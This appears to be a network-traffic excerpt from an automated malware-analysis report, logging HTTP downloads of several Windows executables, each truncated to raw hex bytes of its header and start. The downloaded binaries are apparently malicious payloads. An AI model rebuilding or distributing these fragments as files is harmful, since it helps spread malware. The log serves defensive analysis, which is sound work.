Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:36:54 GMTContent-Type: application/octet-streamContent-Length: 506368Last-Modified: Tue, 10 Sep 2024 19:10:31 GMTConnection: keep-aliveETag: "66e099a7-7ba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 99 28 de 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 3e 06 00 00 7a 01 00 00 00 00 00 3e 5c 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 5b 06 00 4b 00 00 00 00 60 06 00 b0 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 3c 06 00 00 20 00 00 00 3e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 76 01 00 00 60 06 00 00 78 01 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 07 00 00 02 00 00 00 b8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 34 53 03 00 04 a6 02 00 03 00 00 00 d7 04 00 06 38 f9 05 00 be 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 2e 28 03 00 00 06 28 04 00 00 06 2a 1e 00 28 fd 04 00 06 2a 1e 00 28 01 00 00 06 2a 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 26 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e 1c 03 00 04 28 b6 05 00 06 a2 25 17 1f 47 7e 1c 03 00 04 28 b6 05 00 06 a2 25 18 1f 48 7e 1c 03 00 04 28 b6 05 00 06 a2 25 19 1f 65 7e 1c 03 00 04 28 b6 05 00 06 a2 7e 1d 03 00 04 28 ba 05 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 1a 00 00 06 13 06 00 73 dd 03 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e 1c 03 00 04 28 b6 05 00 06 6f 18 00 00 0a 13 09 11 09 39 15 00 00 00 00 1f 49 7e 1c 03 00 04 28 b
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:36:54 GMTContent-Type: application/octet-streamContent-Length: 506368Last-Modified: Tue, 10 Sep 2024 19:10:31 GMTConnection: keep-aliveETag: "66e099a7-7ba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 99 28 de 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 3e 06 00 00 7a 01 00 00 00 00 00 3e 5c 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 5b 06 00 4b 00 00 00 00 60 06 00 b0 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 3c 06 00 00 20 00 00 00 3e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 76 01 00 00 60 06 00 00 78 01 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 07 00 00 02 00 00 00 b8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 34 53 03 00 04 a6 02 00 03 00 00 00 d7 04 00 06 38 f9 05 00 be 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 2e 28 03 00 00 06 28 04 00 00 06 2a 1e 00 28 fd 04 00 06 2a 1e 00 28 01 00 00 06 2a 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 26 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e 1c 03 00 04 28 b6 05 00 06 a2 25 17 1f 47 7e 1c 03 00 04 28 b6 05 00 06 a2 25 18 1f 48 7e 1c 03 00 04 28 b6 05 00 06 a2 25 19 1f 65 7e 1c 03 00 04 28 b6 05 00 06 a2 7e 1d 03 00 04 28 ba 05 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 1a 00 00 06 13 06 00 73 dd 03 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e 1c 03 00 04 28 b6 05 00 06 6f 18 00 00 0a 13 09 11 09 39 15 00 00 00 00 1f 49 7e 1c 03 00 04 28 b
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:02 GMTContent-Type: application/octet-streamContent-Length: 464896Last-Modified: Sat, 07 Sep 2024 22:52:49 GMTConnection: keep-aliveETag: "66dcd941-71800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e9 d8 dc 66 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4c 04 00 00 ca 02 00 00 00 00 00 76 6b 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 07 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 6b 04 00 4f 00 00 00 00 80 04 00 e4 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 07 00 0c 00 00 00 ec 69 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7c 4b 04 00 00 20 00 00 00 4c 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 c6 02 00 00 80 04 00 00 c8 02 00 00 4e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 07 00 00 02 00 00 00 16 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 6b 04 00 00 00 00 00 48 00 00 00 02 00 05 00 28 36 00 00 94 2c 00 00 03 00 02 00 1e 00 00 06 bc 62 00 00 30 07 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 49 00 00 00 00 00 00 00 02 7e 14 00 00 0a 7d 01 00 00 04 02 28 15 00 00 0a 20 fc 05 00 00 28 16 00 00 0a 02 28 18 00 00 06 20 3c 15 00 00 28 16 00 00 0a 02 7b 03 00 00 04 72 01 00 00 70 6f 17 00 00 0a 14 16 8d 1b 00 00 01 6f 18 00 00 0a 26 2a 00 00 00 13 30 02 00 82 01 00 00 01 00 00 11 03 28 27 00 00 06 0a 06 20 d0 a7 75 d7 35 43 06 20 f3 77 29 46 35 18 06 20 43 a2 a1 36 3b d3 00 00 00 06 20 f3 77 29 46 2e 7d 38 4d 01 00 00 06 20 0a 64 3f 5e 3b f7 00 00 00 06 20 63 89 e9 9c 2e 50 06 20 d0 a7 75 d7 3b c6 00 00 00 38 2a 01 00 00 06 20 c9 4f 8e df 35 18 06 20 b6 6e 70 da 3b 9f 00 00 00 06 20 c9 4f 8e df 2e 76 38 0a 01 00 00 06 20 52 2c 0c e6 2e 57 06 20 80 1e 47 f3 3b 9d 00 00 00 06 20 42 fe 4a fc 2e 2f 38 ea 00 00 00 03 72 1f 00 00 70 28 19 00 00 0a 3a 9e 00 00 00 38 d5 00 00 00 03 72 27 00 00 70 28 19 00 00 0a 3a 8f 00 00 00 38 c0 00 00 00 03 72 2d 00 00 70 28 19 00 00 0a 3a 80 00 00 00 38 ab 00 00 00 03 72 35 00 00 70 28 1
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:05 GMTContent-Type: application/octet-streamContent-Length: 689664Last-Modified: Mon, 05 Aug 2024 00:09:39 GMTConnection: keep-aliveETag: "66b01843-a8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2a 18 b0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 7a 0a 00 00 0a 00 00 00 00 00 00 6e 99 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 99 0a 00 57 00 00 00 00 a0 0a 00 20 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 79 0a 00 00 20 00 00 00 7a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 07 00 00 00 a0 0a 00 00 08 00 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 84 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 99 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 28 bc 05 00 ec dc 04 00 03 00 00 00 4a 05 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 f8 a3 0a 3e 6e c1 cd 91 38 a7 d0 e0 32 bc 14 61 78 1b 14 09 5e 73 28 4f 07 4c e1 b6 7e f1 67 e4 b1 e6 3f bb 1e ab ba 4d 36 e9 02 d7 b8 3b 0a 75 93 fc 12 ea b9 3d a5 6b f2 64 19 14 77 2d 58 5e d6 6b 7c da c2 65 97 b8 51 76 dd 69 a5 ef be 22 c6 6e cc d8 a6 07 89 85 f0 73 12 57 db 86 dc 44 6c b1 5c 73 f9 55 dc 92 ee 76 d9 ca 43 45 69 78 ed 96 31 12 9e 13 47 f0 df fb a4 35 03 81 65 4d 13 82 82 6b 92 db af 5b 1f d7 77 78 31 a3 d5 29 09 77 f6 cb cf 89 5f 85 ae 8e 54 70 8b 86 06 32 46 b8 c6 53 d9 01 55 8a 40 e0 36 1c 92 bf 27 cd e6 71 42 09 5d 4f 84 bd 99 52 ab c8 30 e3 2f 99 c7 91 ed 12 45 53 5f 7b 7c a1 c9 48 ea 3f f9 e4 0a 3c 81 77 90 eb c8 1e be 6d 19 fb 09 66 1f 54 0c c7 9c 65 be 5f bb 6c 07 67 cd be 11 0c 27 5d 90 10 5e d7 14 81 75 a5 18 6c 43 96 f5 f6 ab a2 0f 7b 98 0c 64 30 e0 b7 ca fd 73 9a 47 c2 d9 8d 91 d6 a0 46 6f 13 97 1b 1f 85 76 74 94 4c 32 6b 7c 77 1c a6 d3 53 72 de d8 fd 42 ea 31 1b 59 32 93 57 22 84 d1 95 0c 03 e3 2c 94 7
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:08 GMTContent-Type: application/octet-streamContent-Length: 1381143Last-Modified: Fri, 13 Sep 2024 12:59:12 GMTConnection: keep-aliveETag: "66e43720-151317"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 4b 5a 65 25 2a 34 36 25 2a 34 36 25 2a 34 36 2c 52 b7 36 26 2a 34 36 2c 52 a7 36 34 2a 34 36 25 2a 35 36 89 2a 34 36 3e b7 9e 36 2b 2a 34 36 3e b7 ae 36 24 2a 34 36 3e b7 a9 36 24 2a 34 36 52 69 63 68 25 2a 34 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cf e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 70 00 00 00 de 3e 00 00 42 00 00 99 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 f0 47 00 00 04 00 00 f4 26 15 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 30 47 00 9e 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 00 48 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 6f 00 00 00 10 00 00 00 70 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 66 3e 00 00 b0 00 00 00 02 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 20 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 9e 72 00 00 00 30 47 00 00 74 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0e 32 00 00 00 b0 47 00 00 34 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:12 GMTContent-Type: application/octet-streamContent-Length: 321536Last-Modified: Mon, 16 Sep 2024 13:46:13 GMTConnection: keep-aliveETag: "66e836a5-4e800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 26 e8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 0a 00 00 00 00 00 00 0e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 fa 04 00 57 00 00 00 00 00 05 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 7c f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 db 04 00 00 20 00 00 00 dc 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 08 06 00 00 00 00 05 00 00 08 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 fa 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e9 04 00 e4 0f 00 00 03 00 02 00 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 c9 11 68 37 03 ef c9 ea 63 37 33 eb 0c 77 88 e8 56 29 4a 2e 3a 18 a0 61 ed 57 27 e2 3d e6 7c a4 94 a0 51 26 fe a7 b0 05 a7 70 e5 eb e9 0e 49 49 6f 4f 9a 0c e2 67 c5 f5 c5 96 51 c2 fb 08 50 b7 7e 43 4d 16 02 1d 76 40 8e 50 2a e4 ea 53 6c 93 7f 83 1b 61 3d 08 cb 3a 75 3f 45 44 bd 22 a1 f8 4a 70 d6 d5 f1 8a 8f c5 32 a7 96 72 1c 42 c6 a3 ea 48 be cc 98 82 3f b7 76 87 a7 30 5d 32 ae c1 1f e9 8c e5 3e f4 c3 46 cc 7d c9 73 36 0b 98 4e 0e 2e cf 88 68 f7 23 19 a5 c6 02 ab 5a 93 36 97 d9 67 5e 67 75 da 61 57 26 d1 8a 32 95 6e 3f ad 76 97 d9 b0 2a e0 53 88 cb 14 7d 85 21 d4 5e 14 a1 45 cc 68 aa 64 70 c0 d3 c5 a5 14 bf 66 63 34 7b d7 b5 d3 2f 4f aa ac 49 bd f5 84 b9 76 e1 51 2c 55 d4 d4 e2 3e 78 4b b6 ac 63 f5 44 ca 85 1b e6 2f 0e d4 45 37 2e 00 ae 54 1c e3 ad a6 f4 74 84 1a b1 d1 a8 90 b8 79 c2 cc c6 b6 66 87 82 53 43 e2 d6 18 de 29 fa 46 b3 6d cc 22 32 18 c4 a7 ea 4d 73 fb 33 22 4b 4c af 65 89 8c 7a 63 db 42 62 c3 2d 05 6c c3 5c 17 9e fe 01 d
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:37:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 24 Sep 2024 12:56:26 GMTETag: "1c0200-622dd088a9fca"Accept-Ranges: bytesContent-Length: 1835520Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 70 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 36 44 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 63 6f 72 7a 68 61 6f 00 a0 19 00 00 c0 4f 00 00 9e 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6b 78 66 65 61 63 64 00 10 00 00 00 60 69 00 00 06 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 e0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
